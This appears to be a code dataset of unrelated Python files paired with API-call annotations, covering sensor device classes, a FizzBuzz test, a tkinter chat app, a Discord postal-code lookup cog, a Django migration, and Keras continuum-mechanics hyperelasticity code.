def json(self):
"""
A json representation of the device.
:return: A str containing json.
"""
return json.dumps({"name": self.name,
"id": self.id,
"type": self.device_type,
"state": self.device_state,
"battery": self.battery_level})
class WindowSensor(Device):
"""
A sensor that can detect open/close state of a window.
"""
def __init__(self, device_id):
"""
Constructor
:param device_id: The device ID
"""
super().__init__(device_id, "0101")
def update_specifics(self, data):
"""
Updates the window "Open"/"Closed" state
:param data: The data dict received from the actual device
"""
if data["data"]["device_name"] != DeviceType.DOOR_WINDOW_SENSOR.value:
AttributeError(f"Tried to update a window sensor to type "
f"{DeviceType(data['data']['device_name'])}")
if data["data"]["device_status"][4:-2] == "55":
logging.debug("Door/window id " + str(self.id) + " open!")
self.device_state = "Open"
elif data["data"]["device_status"][4:-2] == "AA":
logging.debug("Door/window id " + str(self.id) + " closed!")
self.device_state = "Closed"
class AlarmSensor(Device):
"""
A device that can ring an alarm (HeatAlarm, WaterAlarm, FireAlarm, COAlarm)
"""
def __init__(self, device_id, device_type):
"""
Constructor
:param device_id: The device ID
:param device_type: The device type
"""
super().__init__(device_id, device_type)
def update_specifics(self, data):
"""
Updates the alarm state of the device.
:param data: The data dict received from the actual device
"""
if data["data"]["device_status"][4:-2] == "BB":
self.device_state = "Alarm"
elif data["data"]["device_status"][4:-2] == "AA":
self.device_state = "Normal"
def create_device_from_data(data):
"""
Factory method to create a device from a data dict
:param data: The data dict received from the actual device
:return: A Device object
"""
if data["data"]["device_name"] == DeviceType.DOOR_WINDOW_SENSOR.value:
return WindowSensor(data["data"]["device_ID"])
else:
return AlarmSensor(data["data"]["device_ID"], data["data"]["device_name"]) | [
"json.dumps",
"trio.Event"
] | [((783, 795), 'trio.Event', 'trio.Event', ([], {}), '()\n', (793, 795), False, 'import trio\n'), ((817, 829), 'trio.Event', 'trio.Event', ([], {}), '()\n', (827, 829), False, 'import trio\n'), ((1903, 1915), 'trio.Event', 'trio.Event', ([], {}), '()\n', (1913, 1915), False, 'import trio\n'), ((2058, 2070), 'trio.Event', 'trio.Event', ([], {}), '()\n', (2068, 2070), False, 'import trio\n'), ((3090, 3225), 'json.dumps', 'json.dumps', (["{'name': self.name, 'id': self.id, 'type': self.device_type, 'state': self.\n device_state, 'battery': self.battery_level}"], {}), "({'name': self.name, 'id': self.id, 'type': self.device_type,\n 'state': self.device_state, 'battery': self.battery_level})\n", (3100, 3225), False, 'import json\n')] |
from problems.fizz_buzz import FizzBuzz
def test_fizz_buzz():
output = FizzBuzz.compute()
assert output == ['1', '2', 'fizz', '4', 'buzz', 'fizz', '7', '8', 'fizz', 'buzz', '11', 'fizz', '13', '14',
'fizzbuzz', '16', '17', 'fizz', '19', 'buzz', 'fizz', '22', '23', 'fizz', 'buzz', '26', 'fizz',
'28', '29', 'fizzbuzz', '31', '32', 'fizz', '34', 'buzz', 'fizz', '37', '38', 'fizz', 'buzz',
'41', 'fizz', '43', '44', 'fizzbuzz', '46', '47', 'fizz', '49', 'buzz', 'fizz', '52', '53',
'fizz', 'buzz', '56', 'fizz', '58', '59', 'fizzbuzz', '61', '62', 'fizz', '64', 'buzz', 'fizz',
'67', '68', 'fizz', 'buzz', '71', 'fizz', '73', '74', 'fizzbuzz', '76', '77', 'fizz', '79',
'buzz', 'fizz', '82', '83', 'fizz', 'buzz', '86', 'fizz', '88', '89', 'fizzbuzz', '91', '92',
'fizz', '94', 'buzz', 'fizz', '97', '98', 'fizz', 'buzz']
| [
"problems.fizz_buzz.FizzBuzz.compute"
] | [((77, 95), 'problems.fizz_buzz.FizzBuzz.compute', 'FizzBuzz.compute', ([], {}), '()\n', (93, 95), False, 'from problems.fizz_buzz import FizzBuzz\n')] |
# Start Date: 3/9/2021
# Last Updated: 3/9/2021
# Author: <NAME>
# App Name: Chat App (Multi Client)
# Version: GUI Version 1.0
# Type: Server, Client
# import multiple_chat_app_server as mcas
# import multiple_chat_app_client as mcac
import os, sys
import tkinter
from tkinter import Label, ttk
def requirement_check():
if not os.path.exists('database') :
os.makedirs('database')
class MenuBar(tkinter.Menu):
def __init__(self, ws):
tkinter.Menu.__init__(self, ws)
connnectionmenu = tkinter.Menu(self, tearoff=False)
connnectionmenu.add_command(label="New Connection", command=self.donothing, accelerator="Ctrl+N")
self.bind_all('<Control-n>', self.donothing)
connnectionmenu.add_command(label="Open Connection", command=self.donothing, accelerator="Ctrl+O")
self.bind_all('<Control-o>', self.donothing)
connnectionmenu.add_command(label="Close Connection", underline=1, command=self.donothing, accelerator="Ctrl+Q")
self.bind_all('<Control-q>', self.donothing)
connnectionmenu.add_separator()
connnectionmenu.add_command(label="Exit", accelerator="Alt+F4", command=self.exit)
self.bind_all('<Alt-F4>', self.exit)
self.add_cascade(label="Connection", menu=connnectionmenu)
helpmenu = tkinter.Menu(self, tearoff=0)
helpmenu.add_command(label="Help Index", command=self.donothing)
self.add_cascade(label="Help", menu=helpmenu)
def donothing(self, event):
print('hi')
def exit(self, event):
sys.exit()
class MainInterface(tkinter.Frame):
def __init__(self):
tkinter.Frame.__init__(self)
# self.config(width="500px", height="400px", bg="red")
label = tkinter.Label(self, text='hilkjfa asd jkaljkjakjd jaisdjsajfkj\nafdalkj l\n', bg="#000000")
label.pack()
class App(tkinter.Tk):
def __init__(self):
tkinter.Tk.__init__(self)
self.title("Simple Chat App")
self.geometry('500x400')
menubar = MenuBar(self)
#container = tkinter.Frame(self, width="500px", height="400px", bg="red")
#container.pack()
frame = MainInterface()
frame.pack()
self.config(menu=menubar)
# def gui_draw():
# main_frame = tkinter.Frame(root, width="500px", height="400px", bg="")
# main_frame.pack()
# btn = tkinter.Button(root, text="Hi", width=6)
# btn.place(x=10, y=100)
# root.config(menu=menubar)
# root.resizable(0,0)
# root.mainloop()
if __name__ == "__main__":
address = "127.0.0.1" # change server IP, don't forget to change in client
port = 4444 # change port number, don't forget to change in client
username = "User" # change Username
requirement_check()
app = App()
app.mainloop()
# gui_draw()
| [
"tkinter.Menu",
"os.path.exists",
"tkinter.Frame.__init__",
"os.makedirs",
"tkinter.Tk.__init__",
"tkinter.Menu.__init__",
"tkinter.Label",
"sys.exit"
] | [((349, 375), 'os.path.exists', 'os.path.exists', (['"""database"""'], {}), "('database')\n", (363, 375), False, 'import os, sys\n'), ((387, 410), 'os.makedirs', 'os.makedirs', (['"""database"""'], {}), "('database')\n", (398, 410), False, 'import os, sys\n'), ((481, 512), 'tkinter.Menu.__init__', 'tkinter.Menu.__init__', (['self', 'ws'], {}), '(self, ws)\n', (502, 512), False, 'import tkinter\n'), ((542, 575), 'tkinter.Menu', 'tkinter.Menu', (['self'], {'tearoff': '(False)'}), '(self, tearoff=False)\n', (554, 575), False, 'import tkinter\n'), ((1364, 1393), 'tkinter.Menu', 'tkinter.Menu', (['self'], {'tearoff': '(0)'}), '(self, tearoff=0)\n', (1376, 1393), False, 'import tkinter\n'), ((1622, 1632), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1630, 1632), False, 'import os, sys\n'), ((1708, 1736), 'tkinter.Frame.__init__', 'tkinter.Frame.__init__', (['self'], {}), '(self)\n', (1730, 1736), False, 'import tkinter\n'), ((1818, 1916), 'tkinter.Label', 'tkinter.Label', (['self'], {'text': '"""hilkjfa asd jkaljkjakjd jaisdjsajfkj\nafdalkj l\n"""', 'bg': '"""#000000"""'}), '(self, text=\n """hilkjfa asd jkaljkjakjd jaisdjsajfkj\nafdalkj l\n""", bg=\'#000000\')\n', (1831, 1916), False, 'import tkinter\n'), ((2004, 2029), 'tkinter.Tk.__init__', 'tkinter.Tk.__init__', (['self'], {}), '(self)\n', (2023, 2029), False, 'import tkinter\n')] |
from discord.ext import commands
import requests
class Cep(commands.Cog):
""" Talks with user """
def __init__(self, bot):
self.bot = bot
@commands.command(name = 'cep',help="Verifica os dados de um CEP Brasileiro")
async def consult_cep(self, ctx, cep):
#viacep.com.br/ws/cep/json/
try:
if len(cep)>8 or len(cep)<8:
await ctx.send(f'CEP inválido')
else:
response = requests.get(f'https://viacep.com.br/ws/{cep}/json/')
data = response.json()
localidade = data.get('localidade')
bairro = data.get('bairro')
logradouro = data.get('logradouro')
complemento = data.get('complemento')
await ctx.send(f'Localidade:{localidade}\nBairro:{bairro}\nLogradouro:{logradouro}\nComplemento: {complemento}')
except:
await ctx.send('Algo inesperado aconteceu...')
def setup(bot):
bot.add_cog(Cep(bot))
| [
"discord.ext.commands.command",
"requests.get"
] | [((170, 245), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""cep"""', 'help': '"""Verifica os dados de um CEP Brasileiro"""'}), "(name='cep', help='Verifica os dados de um CEP Brasileiro')\n", (186, 245), False, 'from discord.ext import commands\n'), ((473, 526), 'requests.get', 'requests.get', (['f"""https://viacep.com.br/ws/{cep}/json/"""'], {}), "(f'https://viacep.com.br/ws/{cep}/json/')\n", (485, 526), False, 'import requests\n')] |
# Generated by Django 2.2 on 2019-05-16 07:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ward_mapping', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='map2011',
name='old_survey_ward_code',
field=models.CharField(max_length=30, unique=True),
),
]
| [
"django.db.models.CharField"
] | [((343, 387), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)', 'unique': '(True)'}), '(max_length=30, unique=True)\n', (359, 387), False, 'from django.db import migrations, models\n')] |
# Standard imports
import keras as k
import tensorflow as tf
import numpy as np
"""
NOTE:
All functions in this file are directly adopted from continuum mechanics fundamentals
and hence do not need further introduction. In order to not inflate this file
unnecessarily with comments (and sacrificing readability), we decided to mostly omit
the type of comment blocks we put in all other functions of this project. These
comment blocks are only present when we deemed them necessary.
Explanations to the continuum mechanics basics utilized can be found in the article
and/or standard textbooks on the subject.
The functions in this file can be sorted into three groups:
- basic continuum mechanics functions
- collective continuum mechanics functions (that chain basic functions in a meaningful
order)
- Simple analytical strain-energy functions (for test runs or as artificial data
sources)
"""
##########################################################################################
##########################################################################################
###### BASIC CONTINUUM MECHANICS FUNCTIONS ###############################################
##########################################################################################
##########################################################################################
def wrapper(numTens, numDir):
"""
Returns all basic continuum mechanics functions which have a direct dependency on the
number of generalized structural tensors or preferred directions to use. The returned
functions are tailored to the desired specifications.
Parameters
----------
numTens : int
Number of generalized structural tensors to use (at least 1).
numDir : int
Number of preferred directions to use (0 for isotropy, more than 0 for anisotropy).
Returns
-------
ten2_H : function
A function for generalized structural tensors.
invariants_I : function
A function for generalized invariants I.
invariants_J : function
A function for generalized invariants J.
"""
def ten2_H(L, w): # Generalized structural tensors: H_r = \sum_i w_ri * L_i [?,numTens,3,3]
batchSize = tf.shape(w)[0]
# Create L_0 and add it to L
shaper = batchSize*tf.constant([1,0,0,0]) + tf.constant([0,1,1,1])
L_0 = 1.0/3.0 * tf.tile(tf.keras.backend.expand_dims(tf.keras.backend.expand_dims(tf.eye(3),0),0), shaper)
if numDir > 0:
L = tf.concat([L_0, L], axis=1)
else:
L = L_0
# Expand L (to get one for each numTens)
shaper = numTens*tf.constant([0,1,0,0,0]) + tf.constant([1,0,1,1,1])
L = tf.tile(tf.keras.backend.expand_dims(L, 1), shaper)
# Expand w
shaper = tf.constant([1,1,1,3])
w = tf.tile(tf.keras.backend.expand_dims(w, 3), shaper)
shaper = tf.constant([1,1,1,1,3])
w = tf.tile(tf.keras.backend.expand_dims(w, 4), shaper)
# Multiply L with weights
L_weighted = tf.math.multiply(L, w)
# Sum them up for the corresponding H
H = tf.math.reduce_sum(L_weighted, axis=2)
return H
def invariants_I(C, H): # Generalized invariants I: I_r = trace(C*H_r) [?,numTens]
shaper = tf.constant([1,numTens,1,1])
C_tile = tf.tile(tf.keras.backend.expand_dims(C, 1), shaper)
return tf.linalg.trace(tf.matmul(C_tile,H))
def invariants_J(C, H): # Generalized invariants J: J_r = trace(cofactor(C)*H_r) [?,numTens]
shaper = tf.constant([1,numTens,1,1])
C_tile = tf.tile(tf.keras.backend.expand_dims(C, 1), shaper)
detC_tile = tf.linalg.det(C_tile)
shaper = tf.constant([1,1,3])
detC_tile = tf.tile(tf.keras.backend.expand_dims(detC_tile, 2), shaper)
shaper = tf.constant([1,1,1,3])
detC_tile = tf.tile(tf.keras.backend.expand_dims(detC_tile, 3), shaper)
invTransC = tf.linalg.inv(tf.transpose(C_tile, perm=[0, 1, 3, 2]))
mul = tf.math.multiply(detC_tile, invTransC)
matmul = tf.matmul(mul, H)
return tf.linalg.trace(matmul)
return ten2_H, invariants_I, invariants_J
def defGrad_ut(lam): # Deformation gradient for incompressible uniaxial tension loading [?,3,3]
F = np.zeros([len(lam), 3, 3])
F[:,0,0] = lam
F[:,1,1] = 1.0/(np.sqrt(lam))
F[:,2,2] = 1.0/(np.sqrt(lam))
return F
def defGrad_bt(lam): # Deformation gradient for incompressible equi-biaxial loading [?,3,3]
F = np.zeros([len(lam), 3, 3])
F[:,0,0] = lam
F[:,1,1] = lam
F[:,2,2] = 1.0/lam**2
return F
def defGrad_ps(lam): # Deformation gradient for incompressible pure shear loading [?,3,3]
F = np.zeros([len(lam), 3, 3])
F[:,0,0] = lam
F[:,1,1] = 1/lam
F[:,2,2] = 1.0
return F
def ten2_C(F): # Right Cauchy-Green tensor: C = F^T * F [?,3,3]
return tf.linalg.matmul(F,F,transpose_a=True)
def ten2_F_isoRef(F): # Deformation gradient in reference configuration [?,3,3]
# In Order for the other formulae to work we need the correct dimension required to produce enough eye matrices/tensors
shaper = tf.shape(F)[0]
shaper = shaper*tf.constant([1,0,0]) + tf.constant([0,1,1])
F_isoRef = tf.tile(tf.keras.backend.expand_dims(tf.eye(3),0), shaper)
return F_isoRef
def ten2_L(dir): # Structural tensor L_i = l_i (x) l_i [?,numDir,3,3]
dir = tf.keras.backend.expand_dims(dir, 3)
dir_t = tf.transpose(dir, perm=[0, 1, 3, 2])
L = tf.linalg.matmul(dir, dir_t)
return L
def invariant_I3(C): # Third invariant of a tensor C: I3 = det(C) [?,1]
return tf.keras.backend.expand_dims(tf.linalg.det(C), 1)
def invariants2principalStretches(I1_arr, I2_arr, I3_arr): # Calculates the principal stretches based on invariants of C [only used for one specific kind of plot]
# Itskov, 2015, Tensor Algebra and Tensor Analysis for Engineers, 4th edition, p. 103-104
dim = I1_arr.shape
eig = np.empty((dim[0],3,), dtype=np.complex_)
eig[:,:] = np.NaN
for i in range(dim[0]):
I1 = I1_arr[i]
I2 = I2_arr[i]
I3 = I3_arr[i]
if np.abs(np.power(I1,2)-3.*I2) > 1e-6:
nom = 2.*np.power(I1,3) - 9.*np.multiply(I1,I2) + 27.*I3
denom = 2.*np.power(np.power(I1,2) - 3*I2,1.5)
theta = np.arccos(nom/denom)
for k in [1, 2, 3]:
eig[i,k-1] = (I1 + 2*np.sqrt(np.power(I1,2)-3.*I2)*np.cos((theta+2*np.pi*(k-1.))/3.))/3.
else:
for k in [1, 2, 3]:
eig[i,k-1] = I1/3. + 1./3.*np.power(27.*I3-np.power(I1,3), 1./3.) * (np.cos(2./3.*np.pi*k) + (0+1j)*np.sin(2./3.*np.pi*k))
principalStretch = np.sqrt(eig)
return principalStretch
def ten2_P(Psi, F): # First Piola Kirchhoff stress tensor: P = dPsi / dF [?,3,3]
der = tf.gradients(Psi, F, unconnected_gradients='zero')
return der[0]
def ten2_P_lagMul(P_iso, F, lagMul): # Lagrange multiplier for incompressibility [?,1]
FtransInv = tf.linalg.inv(tf.transpose(F, perm=[0, 2, 1]))
lagMul = tf.tile(tf.keras.backend.expand_dims(lagMul,2), tf.constant([1,3,3]))
lastTerm = tf.math.multiply(lagMul, FtransInv)
return tf.math.subtract(P_iso, lastTerm)
def ten2_S(P, F): # Second Piola Kirchhoff stress tensor: S = F^-1 * P [?,3,3]
return tf.matmul(tf.linalg.inv(F), P)
def ten2_sigma(P, F, J): # Cauchy stress tensor: sigma = J^-1 * P * F^T [?,3,3]
OneOverJ = tf.tile(tf.keras.backend.expand_dims(tf.math.divide(1.0,J),2), tf.constant([1,3,3]))
return tf.math.multiply(OneOverJ, tf.matmul(P, tf.transpose(F, perm=[0, 2, 1])))
##########################################################################################
##########################################################################################
###### COLLECTIVE CONTINUUM MECHANICS FUNCTIONS ##########################################
##########################################################################################
##########################################################################################
def pre_Psi(numExtra, numTens, numDir, w_model, dir_model): # Deals with everything before the strain-energy is used (deformation measures, structural tensors, invariants)
ten2_H, invariants_I, invariants_J = wrapper(numTens, numDir)
if numExtra == 0:
extra = []
else:
extra = k.layers.Input(shape=(numExtra,), name='extra') # INPUT
# Deformation measures
F = k.layers.Input(shape=(3,3,), name='F') # INPUT
C = k.layers.Lambda(lambda F: ten2_C(F), name='C' )(F)
# Directions and structure tensors
if numDir == 0:
dir = [] # we do not need directions (and hence their sub-ANN) at all
w = tf.ones([tf.shape(F)[0],numTens,1]) # we do not need a sub-ANN to get the weights
L = []
else:
dir = dir_model(extra)
w = w_model(extra)
L = k.layers.Lambda(lambda dir: ten2_L(dir), name='L')(dir)
# Generalized structure tensors
H = k.layers.Lambda(lambda x: ten2_H(x[0], x[1]), name='H')([L, w])
# Generalized invariants
inv_I = k.layers.Lambda(lambda x: invariants_I(x[0], x[1]), name='invariants_I' )([C,H])
inv_J = k.layers.Lambda(lambda x: invariants_J(x[0], x[1]), name='invariants_J' )([C,H])
inv_III_C = k.layers.Lambda(lambda C: invariant_I3(C) , name='invariant_III_C')(C)
# Determination of the eact reference configuration
F_isoRef = k.layers.Lambda(lambda F: ten2_F_isoRef(F), output_shape=(None,3,3), name='F_isoRef' )(F)
C_isoRef = k.layers.Lambda(lambda F: ten2_C(F) , name='C_isoRef' )(F_isoRef)
inv_I_isoRef = k.layers.Lambda(lambda x: invariants_I(x[0], x[1]) , name='invariants_I_isoRef' )([C_isoRef,H])
inv_J_isoRef = k.layers.Lambda(lambda x: invariants_J(x[0], x[1]) , name='invariants_J_isoRef' )([C_isoRef,H])
inv_III_C_isoRef = k.layers.Lambda(lambda C_isoRef: invariant_I3(C_isoRef) , name='invariant_III_C_isoRef')(C_isoRef)
return F, extra, C, inv_I, inv_J, inv_III_C, F_isoRef, C_isoRef, inv_I_isoRef, inv_J_isoRef, inv_III_C_isoRef
def post_Psi(Psi, F): # Deals with everything after the strain-energy is used [variant for compressible materials] (stresses)
P = k.layers.Lambda(lambda x: ten2_P(x[0], x[1]), name='P' )([Psi, F])
return post_Psi_both(Psi, P, F)
def post_Psi_incomp(Psi, Psi_isoRef, F, F_isoRef): # Deals with everything after the strain-energy is used [variant for incompressible materials] (stresses)
P_iso = k.layers.Lambda(lambda x: ten2_P(x[0], x[1]) , name='P_iso' )([Psi, F])
P_isoRef = k.layers.Lambda(lambda x: ten2_P(x[0], x[1]) , name='P_isoRef')([Psi_isoRef, F_isoRef])
lagMul = k.layers.Lambda(lambda P: tf.keras.backend.expand_dims(P[:,0,0],1), name='lagMul' )(P_isoRef)
P = k.layers.Lambda(lambda x: ten2_P_lagMul(x[0], x[1], x[2]) , name='P' )([P_iso, F, lagMul])
return post_Psi_both(Psi, P, F)
def post_Psi_both(Psi, P, F): # Common parts from post_Psi & post_Psi_incomp
S = k.layers.Lambda(lambda x: ten2_S(x[0], x[1]) , name='S' )([P, F])
J = k.layers.Lambda(lambda F: tf.keras.backend.expand_dims(tf.linalg.det(F),1), name='J' )(F)
sigma = k.layers.Lambda(lambda x: ten2_sigma(x[0], x[1], x[2]) , name='sigma')([P, F, J])
P11 = k.layers.Lambda(lambda P: tf.keras.backend.expand_dims(P[:,0,0],1) , name='P11' )(P)
return P11, P, S, sigma
##########################################################################################
##########################################################################################
###### ANALYTICAL STRAIN ENERGY DENSITY FUNCTIONS ########################################
##########################################################################################
##########################################################################################
def MooneyRivlin6term_wrapper(c10, c20, c30, c01, c02, c03):
def MooneyRivlin6term(I, J, I3):
I1 = I*3.0
I2 = J*3.0
Psi = k.layers.Lambda(lambda x: c10*(x[0]-3.0) + c20*(x[0]-3.0)**2 + c30*(x[0]-3.0)**3 + c01*(x[1]-3.0) + c02*(x[1]-3.0)**2 + c03*(x[1]-3.0)**3, name='Psi')([I1, I2, I3])
return Psi
return MooneyRivlin6term
def NeoHookean_wrapper(c):
def NeoHookean(I, J, I3):
I1 = I*3.0
I2 = J*3.0
Psi = k.layers.Lambda(lambda x: c*(x[0]-3.0), name='Psi')([I1, I2, I3])
return Psi
return NeoHookean
def MooneyRivlin_wrapper(c1, c2):
def MooneyRivlin(I, J, I3):
I1 = I*3.0
I2 = J*3.0
Psi = k.layers.Lambda(lambda x: c1*(x[0]-3.0) + c2*(x[1]-3.0), name='Psi')([I1, I2, I3])
return Psi
return MooneyRivlin | [
"numpy.sqrt",
"tensorflow.shape",
"tensorflow.transpose",
"tensorflow.math.subtract",
"numpy.arccos",
"tensorflow.linalg.inv",
"tensorflow.math.divide",
"tensorflow.gradients",
"numpy.sin",
"tensorflow.keras.backend.expand_dims",
"tensorflow.eye",
"numpy.multiply",
"tensorflow.concat",
"te... | [((4611, 4651), 'tensorflow.linalg.matmul', 'tf.linalg.matmul', (['F', 'F'], {'transpose_a': '(True)'}), '(F, F, transpose_a=True)\n', (4627, 4651), True, 'import tensorflow as tf\n'), ((5108, 5144), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['dir', '(3)'], {}), '(dir, 3)\n', (5136, 5144), True, 'import tensorflow as tf\n'), ((5154, 5190), 'tensorflow.transpose', 'tf.transpose', (['dir'], {'perm': '[0, 1, 3, 2]'}), '(dir, perm=[0, 1, 3, 2])\n', (5166, 5190), True, 'import tensorflow as tf\n'), ((5196, 5224), 'tensorflow.linalg.matmul', 'tf.linalg.matmul', (['dir', 'dir_t'], {}), '(dir, dir_t)\n', (5212, 5224), True, 'import tensorflow as tf\n'), ((5652, 5692), 'numpy.empty', 'np.empty', (['(dim[0], 3)'], {'dtype': 'np.complex_'}), '((dim[0], 3), dtype=np.complex_)\n', (5660, 5692), True, 'import numpy as np\n'), ((6269, 6281), 'numpy.sqrt', 'np.sqrt', (['eig'], {}), '(eig)\n', (6276, 6281), True, 'import numpy as np\n'), ((6397, 6447), 'tensorflow.gradients', 'tf.gradients', (['Psi', 'F'], {'unconnected_gradients': '"""zero"""'}), "(Psi, F, unconnected_gradients='zero')\n", (6409, 6447), True, 'import tensorflow as tf\n'), ((6704, 6739), 'tensorflow.math.multiply', 'tf.math.multiply', (['lagMul', 'FtransInv'], {}), '(lagMul, FtransInv)\n', (6720, 6739), True, 'import tensorflow as tf\n'), ((6749, 6782), 'tensorflow.math.subtract', 'tf.math.subtract', (['P_iso', 'lastTerm'], {}), '(P_iso, lastTerm)\n', (6765, 6782), True, 'import tensorflow as tf\n'), ((7994, 8032), 'keras.layers.Input', 'k.layers.Input', ([], {'shape': '(3, 3)', 'name': '"""F"""'}), "(shape=(3, 3), name='F')\n", (8008, 8032), True, 'import keras as k\n'), ((2682, 2707), 'tensorflow.constant', 'tf.constant', (['[1, 1, 1, 3]'], {}), '([1, 1, 1, 3])\n', (2693, 2707), True, 'import tensorflow as tf\n'), ((2774, 2802), 'tensorflow.constant', 'tf.constant', (['[1, 1, 1, 1, 3]'], {}), '([1, 1, 1, 1, 3])\n', (2785, 2802), True, 'import tensorflow as tf\n'), ((2902, 2924), 'tensorflow.math.multiply', 'tf.math.multiply', (['L', 'w'], {}), '(L, w)\n', (2918, 2924), True, 'import tensorflow as tf\n'), ((2973, 3011), 'tensorflow.math.reduce_sum', 'tf.math.reduce_sum', (['L_weighted'], {'axis': '(2)'}), '(L_weighted, axis=2)\n', (2991, 3011), True, 'import tensorflow as tf\n'), ((3123, 3154), 'tensorflow.constant', 'tf.constant', (['[1, numTens, 1, 1]'], {}), '([1, numTens, 1, 1])\n', (3134, 3154), True, 'import tensorflow as tf\n'), ((3370, 3401), 'tensorflow.constant', 'tf.constant', (['[1, numTens, 1, 1]'], {}), '([1, numTens, 1, 1])\n', (3381, 3401), True, 'import tensorflow as tf\n'), ((3479, 3500), 'tensorflow.linalg.det', 'tf.linalg.det', (['C_tile'], {}), '(C_tile)\n', (3492, 3500), True, 'import tensorflow as tf\n'), ((3512, 3534), 'tensorflow.constant', 'tf.constant', (['[1, 1, 3]'], {}), '([1, 1, 3])\n', (3523, 3534), True, 'import tensorflow as tf\n'), ((3618, 3643), 'tensorflow.constant', 'tf.constant', (['[1, 1, 1, 3]'], {}), '([1, 1, 1, 3])\n', (3629, 3643), True, 'import tensorflow as tf\n'), ((3798, 3836), 'tensorflow.math.multiply', 'tf.math.multiply', (['detC_tile', 'invTransC'], {}), '(detC_tile, invTransC)\n', (3814, 3836), True, 'import tensorflow as tf\n'), ((3848, 3865), 'tensorflow.matmul', 'tf.matmul', (['mul', 'H'], {}), '(mul, H)\n', (3857, 3865), True, 'import tensorflow as tf\n'), ((3878, 3901), 'tensorflow.linalg.trace', 'tf.linalg.trace', (['matmul'], {}), '(matmul)\n', (3893, 3901), True, 'import tensorflow as tf\n'), ((4110, 4122), 'numpy.sqrt', 'np.sqrt', (['lam'], {}), '(lam)\n', (4117, 4122), True, 'import numpy as np\n'), ((4141, 4153), 'numpy.sqrt', 'np.sqrt', (['lam'], {}), '(lam)\n', (4148, 4153), True, 'import numpy as np\n'), ((4863, 4874), 'tensorflow.shape', 'tf.shape', (['F'], {}), '(F)\n', (4871, 4874), True, 'import tensorflow as tf\n'), ((4918, 4940), 'tensorflow.constant', 'tf.constant', (['[0, 1, 1]'], {}), '([0, 1, 1])\n', (4929, 4940), True, 'import tensorflow as tf\n'), ((5347, 5363), 'tensorflow.linalg.det', 'tf.linalg.det', (['C'], {}), '(C)\n', (5360, 5363), True, 'import tensorflow as tf\n'), ((6579, 6610), 'tensorflow.transpose', 'tf.transpose', (['F'], {'perm': '[0, 2, 1]'}), '(F, perm=[0, 2, 1])\n', (6591, 6610), True, 'import tensorflow as tf\n'), ((6630, 6669), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['lagMul', '(2)'], {}), '(lagMul, 2)\n', (6658, 6669), True, 'import tensorflow as tf\n'), ((6670, 6692), 'tensorflow.constant', 'tf.constant', (['[1, 3, 3]'], {}), '([1, 3, 3])\n', (6681, 6692), True, 'import tensorflow as tf\n'), ((6881, 6897), 'tensorflow.linalg.inv', 'tf.linalg.inv', (['F'], {}), '(F)\n', (6894, 6897), True, 'import tensorflow as tf\n'), ((7058, 7080), 'tensorflow.constant', 'tf.constant', (['[1, 3, 3]'], {}), '([1, 3, 3])\n', (7069, 7080), True, 'import tensorflow as tf\n'), ((7907, 7954), 'keras.layers.Input', 'k.layers.Input', ([], {'shape': '(numExtra,)', 'name': '"""extra"""'}), "(shape=(numExtra,), name='extra')\n", (7921, 7954), True, 'import keras as k\n'), ((2188, 2199), 'tensorflow.shape', 'tf.shape', (['w'], {}), '(w)\n', (2196, 2199), True, 'import tensorflow as tf\n'), ((2281, 2306), 'tensorflow.constant', 'tf.constant', (['[0, 1, 1, 1]'], {}), '([0, 1, 1, 1])\n', (2292, 2306), True, 'import tensorflow as tf\n'), ((2437, 2464), 'tensorflow.concat', 'tf.concat', (['[L_0, L]'], {'axis': '(1)'}), '([L_0, L], axis=1)\n', (2446, 2464), True, 'import tensorflow as tf\n'), ((2574, 2602), 'tensorflow.constant', 'tf.constant', (['[1, 0, 1, 1, 1]'], {}), '([1, 0, 1, 1, 1])\n', (2585, 2602), True, 'import tensorflow as tf\n'), ((2613, 2647), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['L', '(1)'], {}), '(L, 1)\n', (2641, 2647), True, 'import tensorflow as tf\n'), ((2719, 2753), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['w', '(3)'], {}), '(w, 3)\n', (2747, 2753), True, 'import tensorflow as tf\n'), ((2813, 2847), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['w', '(4)'], {}), '(w, 4)\n', (2841, 2847), True, 'import tensorflow as tf\n'), ((3171, 3205), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['C', '(1)'], {}), '(C, 1)\n', (3199, 3205), True, 'import tensorflow as tf\n'), ((3241, 3261), 'tensorflow.matmul', 'tf.matmul', (['C_tile', 'H'], {}), '(C_tile, H)\n', (3250, 3261), True, 'import tensorflow as tf\n'), ((3418, 3452), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['C', '(1)'], {}), '(C, 1)\n', (3446, 3452), True, 'import tensorflow as tf\n'), ((3555, 3597), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['detC_tile', '(2)'], {}), '(detC_tile, 2)\n', (3583, 3597), True, 'import tensorflow as tf\n'), ((3663, 3705), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['detC_tile', '(3)'], {}), '(detC_tile, 3)\n', (3691, 3705), True, 'import tensorflow as tf\n'), ((3746, 3785), 'tensorflow.transpose', 'tf.transpose', (['C_tile'], {'perm': '[0, 1, 3, 2]'}), '(C_tile, perm=[0, 1, 3, 2])\n', (3758, 3785), True, 'import tensorflow as tf\n'), ((4895, 4917), 'tensorflow.constant', 'tf.constant', (['[1, 0, 0]'], {}), '([1, 0, 0])\n', (4906, 4917), True, 'import tensorflow as tf\n'), ((4989, 4998), 'tensorflow.eye', 'tf.eye', (['(3)'], {}), '(3)\n', (4995, 4998), True, 'import tensorflow as tf\n'), ((5952, 5974), 'numpy.arccos', 'np.arccos', (['(nom / denom)'], {}), '(nom / denom)\n', (5961, 5974), True, 'import numpy as np\n'), ((7032, 7054), 'tensorflow.math.divide', 'tf.math.divide', (['(1.0)', 'J'], {}), '(1.0, J)\n', (7046, 7054), True, 'import tensorflow as tf\n'), ((7128, 7159), 'tensorflow.transpose', 'tf.transpose', (['F'], {'perm': '[0, 2, 